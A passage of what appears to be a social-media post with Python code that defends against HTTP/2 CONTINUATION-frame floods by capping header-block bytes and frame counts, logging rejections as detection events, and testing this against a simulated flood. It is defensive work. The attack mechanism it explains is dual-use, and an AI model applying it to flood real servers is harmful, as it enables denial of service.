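        self.max_block_bytes = max_block_bytes
        self.max_continuations = max_continuations
        self.stream_id, self.buf, self.continuations = None, bytearray(), 0
        self.events = []  # what we log, since the access log never sees this request

    def feed(self, raw):
        """Returns the complete header block on END_HEADERS, None while collecting,
        and raises FloodRejected as soon as a limit is exceeded."""
        ftype, flags, sid, payload = parse_frame(raw)
        if ftype == HEADERS:
            self.stream_id, self.buf, self.continuations = sid, bytearray(), 0
        elif ftype == CONTINUATION:
            if sid != self.stream_id:
                raise FloodRejected(f"CONTINUATION on stream {sid} without open HEADERS")
            self.continuations += 1
        else:
            return None  # other frame types are out of scope for this example
        self.buf += payload
        if len(self.buf) > self.max_block_bytes or self.continuations > self.max_continuations:
            self.events.append({"stream": sid, "reason": "header block limit exceeded",
                                "bytes": len(self.buf), "continuations": self.continuations})
            self.stream_id, self.buf = None, bytearray()
            raise FloodRejected(self.events[-1]["reason"])
        if flags & END_HEADERS:
            block, self.buf, self.stream_id = bytes(self.buf), bytearray(), None
            return block
        return None


def frames_until_rejected(collector, frames):
    """How many frames a collector accepts before it aborts the sequence."""
    accepted = 0
    for f in frames:
        try:
            collector.feed(f)
        except FloodRejected:
            return accepted
        accepted += 1
    return accepted


if __name__ == "__main__":
    c = HeaderBlockCollector()
    print("flood frames accepted:", frames_until_rejected(c, continuation_flood(3)), c.events)
```

The point of the count cap next to the byte cap is that a flood of tiny CONTINUATION frames burns CPU without ever tripping a memory limit; the rejection event is also the detection artifact, because the request never completes and so never reaches the access log.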

Client Info

Server: https://mastodon.social
Version: 2025.04
Repository: https://github.com/cyevgeniy/lmst